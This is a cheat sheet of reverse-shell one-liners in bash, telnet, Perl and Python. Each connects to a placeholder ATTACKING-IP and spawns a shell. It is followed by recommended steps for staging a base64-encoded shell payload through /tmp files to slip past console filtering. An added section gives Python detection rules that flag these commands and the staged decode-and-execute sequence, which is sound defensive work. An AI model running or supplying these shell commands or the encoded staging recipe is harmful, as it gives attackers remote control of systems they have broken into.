Bash Reverse Shell
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1
Telnet Reverse Shell
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
Perl Reverse Shell
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python Reverse Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Note: In some cases the payload has to be passed to the console in encoded form. I recommend the following steps:
1. Write the encoded payload to a file
echo ZXhlYyAvYmluL2Jhc2ggMCYwIDI+JjA= | tee /tmp/ex.txt
2. Decode
cat /tmp/ex.txt | base64 -d | tee /tmp/ex2.txt
3. Rename the file to .sh
mv /tmp/ex2.txt /tmp/ex2.sh
4. Make the file executable
chmod +x /tmp/ex2.sh
5. Execute
/bin/sh /tmp/ex2.sh
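
Added example (not part of the original page): detection logic in Python that flags the one-liner shapes listed above in process command-line telemetry and follows the decode, rename, execute sequence of steps 1 to 5. The rule names, function names and sample lines are assumptions constructed for illustration.

```python
import re
import shlex

# Added example: rule and function names are hypothetical, not from the page.
RULES = {
    "bash_dev_tcp": re.compile(r"/dev/(tcp|udp)/[^/\s]+/\d+"),
    "telnet_pipe_shell": re.compile(
        r"telnet\s+\S+\s+\d+\s*\|\s*/bin/(ba)?sh\s*\|\s*telnet"),
    "interp_socket_shell": re.compile(
        r"\b(perl|python[\d.]*)\s+-[ec]\s.*socket.*/bin/(ba)?sh"),
}
# base64 decode whose output lands in a file via tee or a redirect.
DECODE_TO_FILE = re.compile(r"base64\s+(?:-d|--decode)\b.*?(?:\btee\s+|>\s*)(\S+)")
SHELLS = {"sh", "bash", "/bin/sh", "/bin/bash"}

def match_rules(cmdline):
    """Names of the single-command rules that one command line matches."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def staged_exec(cmdlines):
    """Paths that were base64-decoded to disk, possibly renamed, then run."""
    tainted, hits = set(), []
    for line in cmdlines:
        m = DECODE_TO_FILE.search(line)
        if m:
            tainted.add(m.group(1))
            continue
        try:
            argv = shlex.split(line)
        except ValueError:          # unbalanced quotes: skip, do not crash
            continue
        if len(argv) == 3 and argv[0] == "mv" and argv[1] in tainted:
            tainted.discard(argv[1])
            tainted.add(argv[2])    # taint follows the rename (step 3)
        elif argv and argv[0] in tainted:
            hits.append(argv[0])    # decoded file run directly
        elif len(argv) > 1 and argv[0] in SHELLS and argv[1] in tainted:
            hits.append(argv[1])    # decoded file run through a shell (step 5)
    return hits

# Constructed sample process command lines, not real logs.
SAMPLE = ["bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1",
          "cat /tmp/ex.txt | base64 -d | tee /tmp/ex2.txt",
          "mv /tmp/ex2.txt /tmp/ex2.sh", "chmod +x /tmp/ex2.sh",
          "/bin/sh /tmp/ex2.sh", "base64 -d /etc/ssl/cert.b64"]

if __name__ == "__main__":
    for line in SAMPLE:
        print(match_rules(line), line)
    print("staged:", staged_exec(SAMPLE))
```

The single-command rules catch the one-liners as typed; the sequence tracker catches the staged variant, where no individual command looks like a shell.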